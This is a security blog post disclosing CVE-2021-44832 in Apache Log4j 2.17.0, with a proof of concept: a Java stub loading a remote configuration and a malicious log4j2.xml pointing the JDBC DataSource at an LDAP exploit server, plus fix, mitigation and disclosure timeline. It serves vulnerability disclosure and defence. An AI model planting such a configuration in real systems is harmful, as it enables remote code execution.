<!DOCTYPE html>
<html lang=en>
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta property="og:description" content="Security research blog">
    <meta property="og:type" content="website">
    <meta name="description" content="Security research blog">
    <meta name="keyword"  content="security,research,vulnerability,blog,vulnerabilites">
    <link rel="shortcut icon" href="/img/favicon.ico">
    <title>
        
        CVE-2021-44832: Apache Log4j 2.17.0 Arbitrary Code Execution via JDBCAppender DataSource Element - YNizry
        
    </title>

    <!-- Custom CSS -->
    
<link rel="stylesheet" href="/css/aircloud.css">

    
<link rel="stylesheet" href="/css/gitment.css">

    <!--<link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css">-->
    <link href="//at.alicdn.com/t/font_620856_28hi1hpxx24.css" rel="stylesheet" type="text/css">

    <link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons">
    <style>
    .googleicon {
        vertical-align: middle;
        font-size: 16px;
        font-style: normal;
        -webkit-font-smoothing: antialiased;
        -moz-osx-font-smoothing: grayscale;    
        color: #999999;
        }
    </style>

    <!-- ga & ba script hoook -->
    <script></script>

    
  
  
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-SCK9223GY8"></script>
    <script>
      window.dataLayer = window.dataLayer || []
      function gtag() {
        dataLayer.push(arguments)
      }
      gtag('js', new Date())
      gtag('config', 'G-SCK9223GY8')
    </script>
  










<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="Yaniv Nizry Blogs" type="application/atom+xml">
</head>

<body>

<div class="site-nav-toggle" id="site-nav-toggle">
    <button>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
    </button>
</div>

<div class="index-about">
    <i>  </i>
</div>

<div class="index-container">
    
    <div class="index-left">
        
<div class="nav" id="nav">
    <div class="avatar-name">
        <div class="avatar radius">
            <img src="/img/avatar.webp" />
        </div>
        <div class="name">
            <i>Yaniv Nizry</i>
        </div>
    </div>
    <div class="contents" id="nav-content">
        <ul>
            <li >
                <a href="/">
                    <i class="iconfont icon-shouye1"></i>
                    <span>Blogs</span>
                </a>
            </li>
            <li >
                <a href="/advisories">
                    <i class="material-icons googleicon">speaker_notes</i>
                    <span>Advisories</span>
                </a>
            </li>
            <li >
                <a href="/tags">
                    <i class="iconfont icon-biaoqian1"></i>
                    <span>Tags</span>
                </a>
            </li>
            <li >
                <a href="/archive">
                    <i class="iconfont icon-guidang2"></i>
                    <span>Archives</span>
                </a>
            </li>
            <li >
                <a href="/about/">
                    <i class="iconfont icon-guanyu2"></i>
                    <span>About</span>
                </a>
            </li>
            
            <li>
                <a id="search">
                    <i class="iconfont icon-sousuo1"></i>
                    <span>Search</span>
                </a>
            </li>
            
        </ul>
    </div>
    
        <div id="toc" class="toc-article">
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Introduction"><span class="toc-text">Introduction</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Technical-Details"><span class="toc-text">Technical Details</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Steps-To-Reproduce"><span class="toc-text">Steps To Reproduce</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Expected-Results"><span class="toc-text">Expected Results</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Apache%E2%80%99s-Fix"><span class="toc-text">Apache’s Fix</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Why-Is-This-Interesting"><span class="toc-text">Why Is This Interesting?</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Mitigation"><span class="toc-text">Mitigation</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Timeline-of-Disclosure"><span class="toc-text">Timeline of Disclosure</span></a></li></ol>
</div>
    
</div>


<div class="search-field" id="search-field">
    <div class="search-bg" id="search-bg"></div>
    <div class="search-container">
        <div class="search-input">
            <span id="esc-search"> <i class="icon-fanhui iconfont"></i></span>
            <input id="search-input"/>
            <span id="begin-search">search</span>
        </div>
        <div class="search-result-container" id="search-result-container">

        </div>
    </div>
</div>

        <div class="index-about-mobile">
            <i>  </i>
        </div>
    </div>
    
    <div class="index-middle">
        <!-- Main Content -->
        <div class="post-container">
    <div class="post-title">
        CVE-2021-44832: Apache Log4j 2.17.0 Arbitrary Code Execution via JDBCAppender DataSource Element    
    </div>

    <div class="post-meta">
        <span class="attr">Post：<span>2021-12-27 23:00:00</span></span>
        
        
        <span class="attr">Tags：/
        
        <a class="tag" href="/tags/#java" title="java">java</a>
        <span>/</span>
        
        <a class="tag" href="/tags/#deserialization" title="deserialization">deserialization</a>
        <span>/</span>
        
        <a class="tag" href="/tags/#log4j" title="log4j">log4j</a>
        <span>/</span>
        
        <a class="tag" href="/tags/#log4j2" title="log4j2">log4j2</a>
        <span>/</span>
        
        </span>
        
        

        
            <span class="attr">/
            
                <a target="_blank" rel="noopener" href="https://nvd.nist.gov/vuln/detail/CVE-2021-44832" title="CVE-2021-44832">CVE-2021-44832</a>
                    <span>/</span>
            
            
            </span>
        


        
        <!--<span class="attr">Visit：<span id="busuanzi_value_page_pv"></span>-->
    </span>
    </span>
    </div>

    <div class="post-source-meta post-meta">
        
            <a target="_blank" rel="noopener" href="https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element">Source</a>
        
    </div>
    <div class="post-content no-indent">
        <h1 id="Introduction"><a href="#Introduction" class="headerlink" title="Introduction"></a>Introduction</h1><p>Log4j is a highly popular logging package in Java that is used widely by developers, companies such as Google, Steam, Apple, Minecraft, and even on one of NASA’s Mars rovers utilize this package. On December 9th, the most critical zero-day exploit in recent years was discovered in log4j. The vulnerability <a target="_blank" rel="noopener" href="https://checkmarx.com/blog/apache-log4j-remote-code-execution-cve-2021-44228/">CVE-2021-44228</a> was unauthenticated, zero-click RCE (Remote Code Execution) by logging a certain payload.</p>
<p>Following that, a big hype was created in the world and especially in the security community, making many researchers interested in logging packages. Several other vulnerabilities and bypasses were found and published since then in log4j and other logging packages, find out more on our <a target="_blank" rel="noopener" href="https://checkmarx.com/resources/homepage/apache-log4j-rce-variants-and-updates">“Variants and Updates”</a> blog.</p>
<h1 id="Technical-Details"><a href="#Technical-Details" class="headerlink" title="Technical Details"></a>Technical Details</h1><p>Being extremely focused and dedicated researchers, we wanted to do a security audit ourselves on the log4j package in the hope of finding something interesting. And after a week of reviewing the code and testing, we encountered a new undiscovered deserialization security vulnerability. This vulnerability doesn’t use the disabled lookup feature.</p>
<p>The complexity of this vulnerability is higher than the original CVE-2021-44228 since it requires the attacker to have control over the configuration (like the ‘logback’ vulnerability <a target="_blank" rel="noopener" href="https://nvd.nist.gov/vuln/detail/CVE-2021-42550">CVE-2021-42550</a>). <strong>In log4j there is a feature to load a remote configuration file</strong> that isn’t part of the local codebase and opens various attack vectors such as <a target="_blank" rel="noopener" href="https://en.wikipedia.org/wiki/Man-in-the-middle_attack">MITM</a> (man in the middle) attack, DNS poisoning, lateral movement after gaining access to a storage node.</p>
<p>While looking at log4j features we came across the <a target="_blank" rel="noopener" href="https://logging.apache.org/log4j/2.x/manual/appenders.html">‘Appender’</a> functionalities. Appenders are basically where to output the logs, so we have for example ConsoleAppender, FileAppender, etc.</p>
<p>The <a target="_blank" rel="noopener" href="https://logging.apache.org/log4j/2.x/manual/appenders.html#JDBCAppender">JDBCAppender</a> caught our eyes since there are some public ways of getting RCE via JDBC Java deserialization (see this <a target="_blank" rel="noopener" href="https://www.youtube.com/watch?v=Lv9BC_bYaI8">Blackhat</a> talk By Yongtao Wang, Lucas Zhang and Kunzhe Chai for more information).</p>
<p>But before getting into the JDBC deserialization in log4j, we noticed that in the documentation there is a way to configure log4j so that it will fetch the database source dynamically and remotely via JNDI. The configuration of the remote database location is done with the DataSource element. Taking the example from the official documentation:</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;UTF-8&quot;</span>?&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">Configuration</span> <span class="attr">status</span>=<span class="string">&quot;error&quot;</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">Appenders</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">JDBC</span> <span class="attr">name</span>=<span class="string">&quot;databaseAppender&quot;</span> <span class="attr">tableName</span>=<span class="string">&quot;dbo.application_log&quot;</span>&gt;</span></span><br><span class="line">		     <span class="tag">&lt;<span class="name">DataSource</span> <span class="attr">jndiName</span>=<span class="string">&quot;java:/comp/env/jdbc/LoggingDataSource&quot;</span> /&gt;</span></span><br><span class="line">		 <span class="tag">&lt;<span class="name">Column</span> <span class="attr">...</span></span></span><br><span class="line"><span class="tag">	&lt;/<span class="attr">JDBC</span>&gt;</span></span><br><span class="line"> <span class="tag">&lt;/<span class="name">Appenders</span>&gt;</span></span><br><span class="line">…</span><br><span class="line"><span class="tag">&lt;/<span class="name">Configuration</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>there was not any restriction of putting an arbitrary LDAP remote URL, thus making it potential to the classic JNDI:LDAP deserialization vector (more information on the <a target="_blank" rel="noopener" href="https://www.youtube.com/watch?v=Y8a5nB-vy78">Blackhat</a> talk by Alvaro Munoz &amp; Oleksandr Mirosh).<br>After changing the tag to:</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">DataSource</span> <span class="attr">jndiName</span>=<span class="string">&quot;ldap://127.0.0.1:1389/Exploit&quot;</span>/&gt;</span></span><br></pre></td></tr></table></figure>
<p>our payload was triggered, and we executed calc.exe on the machine.<br><img src="/img/blogs/log4j2/Image-1.png" style="width: 100%;"/><br><video controls="" src="/videos/log4j2/Video-1.mov" style="width: 100%;"></video></p>
<p><code>DataSource dataSource = (DataSource)context.lookup(jndiName);</code></p>
<p>Is the line that triggers the JNDI lookup, it is in <code>DataSourceConnectionSource -&gt; createConnectionSource</code> which is called from the <code>PluginBuilder</code>. And this is also the reason for the crash since we cannot cast the object to DataSource (the crash happens after the deserialization). The lookup function will do LDAP lookup to the “RemainingName” which is the DN (what comes after the slash).</p>
<p>To understand the calls better, we can follow the callgraph bottom up to see who calls who:</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">createConnectionSource:<span class="number">75</span>, DataSourceConnectionSource (org<span class="selector-class">.apache</span><span class="selector-class">.logging</span><span class="selector-class">.log4j</span><span class="selector-class">.core</span><span class="selector-class">.appender</span><span class="selector-class">.db</span>.jdbc)</span><br><span class="line">invoke0:-<span class="number">1</span>, NativeMethodAccessorImpl (sun.reflect)</span><br><span class="line">invoke:<span class="number">62</span>, NativeMethodAccessorImpl (sun.reflect)</span><br><span class="line">invoke:<span class="number">43</span>, DelegatingMethodAccessorImpl (sun.reflect)</span><br><span class="line">invoke:<span class="number">498</span>, Method (java<span class="selector-class">.lang</span>.reflect)</span><br><span class="line">build:<span class="number">136</span>, PluginBuilder (org<span class="selector-class">.apache</span><span class="selector-class">.logging</span><span class="selector-class">.log4j</span><span class="selector-class">.core</span><span class="selector-class">.config</span><span class="selector-class">.plugins</span>.util)</span><br><span class="line">createPluginObject:<span class="number">1120</span>, AbstractConfiguration (org<span class="selector-class">.apache</span><span class="selector-class">.logging</span><span class="selector-class">.log4j</span><span class="selector-class">.core</span>.config)</span><br><span class="line">createConfiguration:<span class="number">1045</span>, AbstractConfiguration (org<span class="selector-class">.apache</span><span class="selector-class">.logging</span><span class="selector-class">.log4j</span><span class="selector-class">.core</span>.config)</span><br><span class="line">createConfiguration:<span class="number">1037</span>, AbstractConfiguration (org<span class="selector-class">.apache</span><span class="selector-class">.logging</span><span class="selector-class">.log4j</span><span class="selector-class">.core</span>.config)</span><br><span class="line">createConfiguration:<span class="number">1037</span>, AbstractConfiguration (org<span class="selector-class">.apache</span><span class="selector-class">.logging</span><span class="selector-class">.log4j</span><span class="selector-class">.core</span>.config)</span><br><span class="line">doConfigure:<span class="number">651</span>, AbstractConfiguration (org<span class="selector-class">.apache</span><span class="selector-class">.logging</span><span class="selector-class">.log4j</span><span class="selector-class">.core</span>.config)</span><br><span class="line">initialize:<span class="number">247</span>, AbstractConfiguration (org<span class="selector-class">.apache</span><span class="selector-class">.logging</span><span class="selector-class">.log4j</span><span class="selector-class">.core</span>.config)</span><br><span class="line">start:<span class="number">293</span>, AbstractConfiguration (org<span class="selector-class">.apache</span><span class="selector-class">.logging</span><span class="selector-class">.log4j</span><span class="selector-class">.core</span>.config)</span><br><span class="line">setConfiguration:<span class="number">626</span>, LoggerContext (org<span class="selector-class">.apache</span><span class="selector-class">.logging</span><span class="selector-class">.log4j</span>.core)</span><br><span class="line">reconfigure:<span class="number">699</span>, LoggerContext (org<span class="selector-class">.apache</span><span class="selector-class">.logging</span><span class="selector-class">.log4j</span>.core)</span><br><span class="line">reconfigure:<span class="number">716</span>, LoggerContext (org<span class="selector-class">.apache</span><span class="selector-class">.logging</span><span class="selector-class">.log4j</span>.core)</span><br><span class="line">start:<span class="number">270</span>, LoggerContext (org<span class="selector-class">.apache</span><span class="selector-class">.logging</span><span class="selector-class">.log4j</span>.core)</span><br><span class="line">getContext:<span class="number">155</span>, Log4jContextFactory (org<span class="selector-class">.apache</span><span class="selector-class">.logging</span><span class="selector-class">.log4j</span><span class="selector-class">.core</span>.impl)</span><br><span class="line">getContext:<span class="number">47</span>, Log4jContextFactory (org<span class="selector-class">.apache</span><span class="selector-class">.logging</span><span class="selector-class">.log4j</span><span class="selector-class">.core</span>.impl)</span><br><span class="line">getContext:<span class="number">196</span>, LogManager (org<span class="selector-class">.apache</span><span class="selector-class">.logging</span>.log4j)</span><br><span class="line">getLogger:<span class="number">599</span>, LogManager (org<span class="selector-class">.apache</span><span class="selector-class">.logging</span>.log4j)</span><br><span class="line"><span class="selector-tag">main</span>:<span class="number">11</span>, log4j</span><br></pre></td></tr></table></figure>

<h1 id="Steps-To-Reproduce"><a href="#Steps-To-Reproduce" class="headerlink" title="Steps To Reproduce"></a>Steps To Reproduce</h1><p>For the vulnerability to be exploitable, Log4J’s configuration file needs to be loaded from an external source. This can be a remote FTP server, cloud storage etc. An attacker could use technics such as DNS poisoning and MITM in order to inject a uniquely crafted configuration file and ultimately exploit the vulnerability.</p>
<ol>
<li>Fetching Remote configuration via HTTP<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">System.setProperty(<span class="string">&quot;log4j2.configurationFile&quot;</span>,<span class="string">&quot;http://127.0.0.1:8888/log4j2.xml&quot;</span>);</span><br></pre></td></tr></table></figure></li>
<li>Using the same LDAP (Lightweight Directory Access Protocol) server as done in the CVE-2021-44228 PoC (Proof of Concept), all we need to do is to run:<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//log4j.java</span></span><br><span class="line"><span class="keyword">import</span> org.apache.logging.log4j.LogManager;</span><br><span class="line"><span class="keyword">import</span> org.apache.logging.log4j.Logger;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">log4j</span> &#123;</span><br><span class="line">    <span class="keyword">static</span> &#123;</span><br><span class="line">        System.setProperty(<span class="string">&quot;log4j2.configurationFile&quot;</span>,<span class="string">&quot;http://127.0.0.1:8888/log4j2.xml&quot;</span>);</span><br><span class="line">        System.setProperty(<span class="string">&quot;com.sun.jndi.ldap.object.trustURLCodebase&quot;</span>,<span class="string">&quot;true&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="type">Logger</span> <span class="variable">logger</span> <span class="operator">=</span> LogManager.getLogger(log4j.class);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> &#123;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li>
<li>Inject the malicious log4j2.xml file into the response:<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;UTF-8&quot;</span>?&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">Configuration</span> <span class="attr">status</span>=<span class="string">&quot;error&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">Appenders</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">JDBC</span> <span class="attr">name</span>=<span class="string">&quot;databaseAppender&quot;</span> <span class="attr">tableName</span>=<span class="string">&quot;dbo.application_log&quot;</span>&gt;</span></span><br><span class="line">            <span class="tag">&lt;<span class="name">DataSource</span> <span class="attr">jndiName</span>=<span class="string">&quot;ldap://127.0.0.1:1389/Exploit&quot;</span> /&gt;</span></span><br><span class="line">            <span class="tag">&lt;<span class="name">Column</span> <span class="attr">name</span>=<span class="string">&quot;eventDate&quot;</span> <span class="attr">isEventTimestamp</span>=<span class="string">&quot;true&quot;</span> /&gt;</span></span><br><span class="line">            <span class="tag">&lt;<span class="name">Column</span> <span class="attr">name</span>=<span class="string">&quot;level&quot;</span> <span class="attr">pattern</span>=<span class="string">&quot;%level&quot;</span> /&gt;</span></span><br><span class="line">            <span class="tag">&lt;<span class="name">Column</span> <span class="attr">name</span>=<span class="string">&quot;logger&quot;</span> <span class="attr">pattern</span>=<span class="string">&quot;%logger&quot;</span> /&gt;</span></span><br><span class="line">            <span class="tag">&lt;<span class="name">Column</span> <span class="attr">name</span>=<span class="string">&quot;message&quot;</span> <span class="attr">pattern</span>=<span class="string">&quot;%message&quot;</span> /&gt;</span></span><br><span class="line">            <span class="tag">&lt;<span class="name">Column</span> <span class="attr">name</span>=<span class="string">&quot;exception&quot;</span> <span class="attr">pattern</span>=<span class="string">&quot;%ex&#123;full&#125;&quot;</span> /&gt;</span></span><br><span class="line">        <span class="tag">&lt;/<span class="name">JDBC</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">Appenders</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">Loggers</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Root</span> <span class="attr">level</span>=<span class="string">&quot;warn&quot;</span>&gt;</span></span><br><span class="line">            <span class="tag">&lt;<span class="name">AppenderRef</span> <span class="attr">ref</span>=<span class="string">&quot;databaseAppender&quot;</span>/&gt;</span></span><br><span class="line">        <span class="tag">&lt;/<span class="name">Root</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">Loggers</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">Configuration</span>&gt;</span></span><br></pre></td></tr></table></figure></li>
</ol>
<h1 id="Expected-Results"><a href="#Expected-Results" class="headerlink" title="Expected Results"></a>Expected Results</h1><p>When initializing the logger object, a request to the remote log4j2.xml will be made. In the loading process, an attempt to load the DataSource object will make a request to the LDAP server that will then redirect to a malicious class. In the end, the arbitrary class will be deserialized and executed.</p>
<h1 id="Apache’s-Fix"><a href="#Apache’s-Fix" class="headerlink" title="Apache’s Fix"></a>Apache’s Fix</h1><p>On December 27th the fixing commit <a target="_blank" rel="noopener" href="https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16">05db5f9</a> was released. As we can see before the fix, the lookup of the DataSource was made directly with the InitialContext, which is a Java internal class.</p>
<img src="/img/blogs/log4j2/Image-2.jpg" style="width: 100%;"/>

<p>In version 2.17.1 the lookup uses the log4j’s JNDI wrapper, and thus disables the lookup. A new log4j2.enableJndiJdbc system property was added to reenable this functionality.</p>
<p>This is the reason why the vulnerability is exploitable using log4j’s default system properties.</p>
<h1 id="Why-Is-This-Interesting"><a href="#Why-Is-This-Interesting" class="headerlink" title="Why Is This Interesting?"></a>Why Is This Interesting?</h1><p>There are two main configuration scenarios when using Log4J.</p>
<ul>
<li>The configuration is on a remote location. This can be useful for developers in case of multiple products sharing the same logging configuration. In this case, an attacker could expand their control over a network by gaining access to the node that serves the configuration file, or use techniques such as MITM and DNS poisoning to inject a malicious configuration file and trigger code execution.</li>
<li>The configuration is a local file and is part of the repository or project. This is the case for most products in the wild. Even though this scenario is harder to leverage, an attacker could attempt to alter the configuration file by gaining access to the source code, especially if it’s an open-source project that’s maintained by a community such as GitHub. For example, an attacker could find a popular Java package that’s using Log4J, alter its configuration file, and cause a supply chain attack for developers who are using this package. <strong>Unlike changes to the code itself, configuration files tend to draw less focus and are easier to “sweep under the rug”.</strong></li>
</ul>
<h1 id="Mitigation"><a href="#Mitigation" class="headerlink" title="Mitigation"></a>Mitigation</h1><p>Upgrade your Apache Log4j2 to versions 2.17.1, 2.12.4, and 2.3.2 or above.</p>
<h1 id="Timeline-of-Disclosure"><a href="#Timeline-of-Disclosure" class="headerlink" title="Timeline of Disclosure"></a>Timeline of Disclosure</h1><table>
<thead>
<tr>
<th>Date</th>
<th>Action</th>
</tr>
</thead>
<tbody><tr>
<td>27&#x2F;12&#x2F;2021</td>
<td>Responsible disclosure was made to Apache.</td>
</tr>
<tr>
<td>27&#x2F;12&#x2F;2021</td>
<td>Acknowledgment received from Apache.</td>
</tr>
<tr>
<td>28&#x2F;12&#x2F;2021</td>
<td>Checkmarx customers who were using Log4J were warned, without exposing the vulnerability‘s details.</td>
</tr>
<tr>
<td>28&#x2F;12&#x2F;2021</td>
<td>CVE-2021-44832 was assigned to this issue.</td>
</tr>
<tr>
<td>28&#x2F;12&#x2F;2021</td>
<td>Fixed version 2.17.1 was released.</td>
</tr>
</tbody></table>

        
        <br />
        <div id="comment-container">
        </div>
        <div id="disqus_thread"></div>
        <div id="lv-container"></div>
        <div class="giscus"></div>
    </div>
</div>

    </div>
</div>


<footer class="footer">
    <ul class="list-inline text-center">
        
        <li>
            <a target="_blank" href="https://twitter.com/YNizry">
                            <span class="fa-stack fa-lg">
                                <i class="iconfont icon-twitter"></i>
                            </span>
            </a>
        </li>
        
        

        

        

        
        <li>
            <a target="_blank"  href="https://github.com/yaniv-git">
                            <span class="fa-stack fa-lg">
                                <i class="iconfont icon-github"></i>
                            </span>
            </a>
        </li>
        

        
        <li>
            <a target="_blank"  href="https://www.linkedin.com/in/yaniv-n-8b4a76193">
                            <span class="fa-stack fa-lg">
                                <i class="iconfont icon-linkedin"></i>
                            </span>
            </a>
        </li>
        

    </ul>
    
    <p>
    Theme <a target="_blank" rel="noopener" href="https://github.com/aircloud/hexo-theme-aircloud">AirCloud</a></p>
</footer>




</body>

<script>
    // We expose some of the variables needed by the front end
    window.hexo_search_path = "search.json"
    window.hexo_root = "/"
    window.isPost = true
</script>
<script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>

<script src="/js/index.js"></script>

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>






</html>
